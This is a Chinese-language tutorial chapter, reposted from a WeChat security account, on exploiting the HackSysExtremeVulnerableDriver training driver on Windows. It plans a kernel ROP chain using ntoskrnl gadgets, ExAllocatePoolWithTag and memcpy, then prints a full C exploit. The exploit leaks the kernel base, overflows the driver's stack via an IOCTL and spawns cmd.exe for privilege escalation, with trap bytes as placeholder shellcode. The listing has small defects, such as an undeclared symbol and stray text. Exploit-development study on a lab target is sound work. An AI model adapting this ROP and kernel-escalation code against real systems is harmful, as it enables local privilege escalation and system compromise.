触发 shellcode

我们何时在此处构建有效负载？

到目前为止，我们已经了解了正确组装可用有效负载的基础知识。现在我们已经拥有了所有必要的工具，让我们最终创建我们的有效负载。愿原力与我们同在。如果您错过了之前的帖子，请务必查看它们。

我们的 ROP 链应如下所示：

1. xor ecx, ecx; ret; -> zeroes out our RCX register, which is the first parameter of AllocatePoolWithTag()
2. pop rdx; ret ; -> pops 0x1000 (4096) to rdx register, which is the second parameter of AllocatePoolWithTag() and indicates the size of the pool
3. 0x1000 -> value of rdx
4. AllocatePoolWithTag() -> calls the AllocatePoolWithTag function. The address of the allocated pool will then be in rax
5. mov rcx, rax; ret; -> copies the address to rcx, which will be first parameter of memcpy
6. pop rdx; ret -> gets the source address from stack. This will be our shellcode in userland that will escalate privileges.
7. <address of shellcode location in userland>
8. pop r8; ret; -> gets the size from stack.
9. <size of our shellcode to be copied>
10. memcpy() -> calls the memcpy function and copies our payload to an executable kernel space
11. jmp rcx; -> jumps to a register which stores the address of our shellcode in kernel land

这听起来很复杂，而且可能不会那样工作。我们很可能不得不进行一些调整。然而，计划很简单：在 kernel land 中分配一个可写且可执行的位置，将我们的 payload 复制到该位置，然后跳转到那里。我们需要找到小工具来做我们想做的事。为此，我们将使用 ropper。该工具将通过帮助我们找到小工具来帮助我们完成 ROP 之旅。

我们可能会ntoskrnl.exe复制到安装了 rapper 的机器上，然后寻找小工具！

让我们开始吧！

这是我们得到的：

1. 0x38cf53: xor ecx, ecx; mov rax, rcx; ret; -> Zeroes out rcx register. Also zeroes out rax, but that is ok. Couldn't find a gadget that just turned rcx into 0.
2. 0x416748: pop rdx; ret; -> pops 0x1000 (4096), just like we planned
3. 0x1000 -> value of rdx and size of the buffer
4. AllocatePoolWithTag(); -> function to allocate an executable pool
5. 0xa155de: add rsp, 0x20; ret -> will be explained later
6. 0x20a263: push rax; pop rbx; ret; -> Moving the address in rax to rbx for later use.
7. 0x5af724: push rax; pop r13; ret; -> Moving the addres in rax to r13
8. 0x2c0da6: xchg r8, r13; ret; -> Now exchanging values of r13 and r8
9. 0x93ac7a: mov rcx, r8; mov rax, rcx; ret; -> Finally moving r8 to rcx, as we wished. A single gadget in our draft (mov rcx, rax; ret) was replaced by the last three gadgets. Gadgets are hard to find! We must improvise.
10. 0x416748: pop rdx; ret; -> Popping the address of the shellcode to rdx
11. <ADDRESS OF SHELLCODE>
12. 0x2017f1: pop r8; ret; -> Popping the size of the shellcode to r8
13. <SIZE OF SHELLCODE>
14. memcpy(); -> Address of memcpy function to copy our shellcode to the executable pool
15. 0x408aa2: jmp rbx; -> Jumping to our shellcode. Remember we saved it for later use?

真是一团糟！ 这看起来与我们预测的有效载荷相去甚远。它又乱又大。发生这种情况是因为很难找到完全适合我们需求的小工具。我们经常不得不妥协并接受一些附带损害。

还有一个问题。检查 ExAllocatePoolWithTag 的序言：

正如我们所看到的，它使用了带有影子空间的快速调用过程，也就是 home space。在此约定中，调用方必须在堆栈上为被调用方保留 32 个字节。对于 ExAllocatePoolWithTag，只需要 24 个字节。这意味着在 AllocatePoolWithTag 之后，我们必须确保将 0x18 添加到 rsp。我找到了一个可以做得很好。我将其放在 AllocatePoolWithTag 之后。 add rsp,0x20

以下是我们目前所拥有的：

1. #include <iostream>
2. #include <string>
3. #include <Windows.h>
4. #include <Psapi.h><F10>
5. #define DEVICE_NAME "\\.\HackSysExtremeVulnerableDriver"
6. #define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
8. //Gadgets
9. unsigned long long g_add_rsp_20h_ret = 0xa155de;
11. unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
12. unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
13. unsigned long long g_pop_rdx_ret = 0x416748;
14. unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
15. unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
16. unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
17. unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
18. unsigned long long g_pop_r8_ret = 0x2017f1;
19. unsigned long long g_jmp_rbx = 0x408aa2;
20. unsigned long long kernel_ExAllocatePoolWithTag;
21. unsigned long long kernel_memcpy;
23. // This will store the pid for the process which privileges will be elevated
24. DWORD pid;
26. // Gets kernel base addr
27. unsigned long long get_kernel_base_addr() {
28. LPVOID drivers[1024];
29. DWORD cbNeeded;
30. EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
31. return (unsigned long long)drivers[0];
32. }
34. // Gets handle to driver
35. HANDLE get_handle() {
36. HANDLE h = CreateFileA(DEVICE_NAME,
37. FILE_READ_ACCESS | FILE_WRITE_ACCESS,
38. FILE_SHARE_READ | FILE_SHARE_WRITE,
39. NULL,
40. OPEN_EXISTING,
41. FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
42. NULL);
44. if (h == INVALID_HANDLE_VALUE) {
45. printf("Failed to get handle =(n");
46. return NULL;
47. }
48. return h;
49. }
50. //Helper function to add gadget or address to payload and increment the offset automatically
51. void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
52. {
53. memcpy(in_buffer + *offset, data, size);
54. printf("Wrote %lx to offset %un", *data, *offset);
55. *offset += size;
56. }
57. //Looks up a kernel symbol
58. PVOID get_kernel_symbol_addr(const char *symbol) {
59. PVOID kernelBaseAddr;
60. HMODULE userKernelHandle;
61. PCHAR functionAddress;
62. unsigned long long offset;
64. kernelBaseAddr = (PVOID)get_kernel_base_addr(); // Loaded kernel base address
65. userKernelHandle = LoadLibraryA("C:\Windows\System32\ntoskrnl.exe"); // Opens kernel binary as lib
66. if (userKernelHandle == INVALID_HANDLE_VALUE) {
67. return NULL;
68. }
69. functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol); // Locates the symbol address
70. if (functionAddress == NULL) {
71. return NULL;
72. }
74. offset = functionAddress - ((PCHAR)userKernelHandle); // Subtracts the library base address in memory from the function addresses.
75. return (PVOID)(((PCHAR)kernelBaseAddr) + offset); // Adds the offset to the leaked kernel base address
76. }
78. // Auxiliary function to adjust the offsets for all the gadgets and used functions
79. void adjust_offsets()
80. {
81. unsigned long long kernel_base_addr = get_kernel_base_addr();
82. g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
83. g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
84. g_add_rsp_20h_ret += kernel_base_addr;
85. g_pop_rdx_ret += kernel_base_addr;
86. g_push_rax_pop_rbx_ret += kernel_base_addr;
87. g_push_rax_pop_r13_ret += kernel_base_addr;
88. g_xchg_r8_r13_ret += kernel_base_addr;
89. g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
90. g_pop_r8_ret += kernel_base_addr;
91. g_jmp_rbx += kernel_base_addr;
92. kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
93. kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
94. printf("Primary token: %xu n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
95. printf("PsReferencePrimaryToken base addr: %xun", (ULONGLONG) kernel_PsReferencePrimaryToken - (ULONGLONG) kernel_base_addr);
96. }
97. //Spawns a new cmd and returns the pid for the process
98. DWORD spawnCmd() {
99. STARTUPINFO si;
100. PROCESS_INFORMATION pi;
101. char cmd[] = "C:\Windows\System32\cmd.exe";
102. ZeroMemory(&si, sizeof(si));
103. si.cb = sizeof(si);
104. ZeroMemory(&pi, sizeof(pi));
105. // Start the child process.
106. if (!CreateProcess(NULL, // No module name (use command line)
107. cmd, // Command line
108. NULL, // Process handle not inheritable
109. NULL, // Thread handle not inheritable
110. FALSE, // Set handle inheritance to FALSE
111. CREATE_NEW_CONSOLE, // No creation flags
112. NULL, // Use parent's environment block
113. NULL, // Use parent's starting directory
114. &si, // Pointer to STARTUPINFO structure
115. &pi) // Pointer to PROCESS_INFORMATION structure
116. )
117. {
118. printf("CreateProcess failed (%d).n", GetLastError());
119. return -1;
120. }
122. return pi.dwProcessId;
123. }
125. char *generate_shellcode() {
126. //Generates and returns a shellcode to be executed after the ROP chain. This shellcode must do heavy lifting to elevate privileges.
127. char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 64);
128. memset(shellcode, 0xcc, 64);
129. return shellcode;
130. }
131. void do_buffer_overflow(HANDLE h)
132. {
133. SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20; // 2072 is the offset; there are 15 8-byte long gadgets and an add rsp, 0x20.
134. //Allocates memory for buffer
135. PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
136. //Fills with AAAAAAA...
137. memset((char *)in_buffer, 'A', in_buffer_size);
138. SIZE_T offset = 2072;
139. //Spawns cmd and adjusts the pid
140. pid = spawnCmd();
141. //Adjust gadgets offsets
142. adjust_offsets();
143. //Our shellcode to escalate privileges. To be crafted!
144. char *shellcode = generate_shellcode();
146. //Arbitrary size of our shellcode
147. unsigned long long size_of_copy = 0x100;
149. add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
150. add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
151. add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
152. add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
153. add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
154. offset += 0x20;
156. add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
157. add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
158. add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
159. add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
160. add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
161. add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
162. add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
163. add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
164. add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
165. add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
167. system("pause");
168. printf("Sending buffer.n");
169. //Sends buffer
170. bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
171. if (!result)
172. {
173. printf("IOCTL Failed: %Xn", GetLastError());
174. }
175. HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
176. }
178. int main(int argc, char **argv)
179. {
180. do_buffer_overflow(get_handle());
181. system("pause");
182. }

漏洞越来越大。让我解释一下我创建的一些函数：

add_to_payload：您提供要写入的缓冲区、当前偏移量、要复制的值和大小。它将在提供的偏移量处复制提供给缓冲区的字节数，并将在 N 中增加偏移量，其中 N 是提供的大小。

generate_shellcode：该函数会在 userland 中分配一个缓冲区，将 EoP 的 shellcode 放入其中并返回地址。我们的 ROP 链中的 Memcpy 会将 shellcode 从此函数中分配的地址复制到内核 RWX 区域。目前，它只会填充0xcc指令，在执行时触发陷阱。

spawnCmd：这将生成一个新的 cmd 并返回其 PID。这将是我们将提升权限的过程。

adjust_offsets：使用 Image Base Addr 调整所有偏移量的函数。

此漏洞将触发基于堆栈的溢出，该溢出将在堆栈中执行我们的 ROPChain。ROPChain 将分配可执行（和可写）空间来分配我们的 shellcode 并将其复制到分配的内存中。然后，它将跳转到这个内存区域并执行我们的 shellcode。shellcode 应包含说明，以提升我们进程的权限。到目前为止，你和我在一起吗？ cmd

该漏洞应该会在 WinDBG 上触发一个陷阱。让我们试试：

我不相信这奏效了！调试器捕获了我们的陷阱。现在我们 “所有” 所要做的就是制作一个 shellcode 来提升权限并优雅地（或尽可能优雅地）返回 userland。

原文始发于微信公众号（sec0nd安全）：[使用 HEVD 破解 Windows 内核]第 3 章：触发 shellcode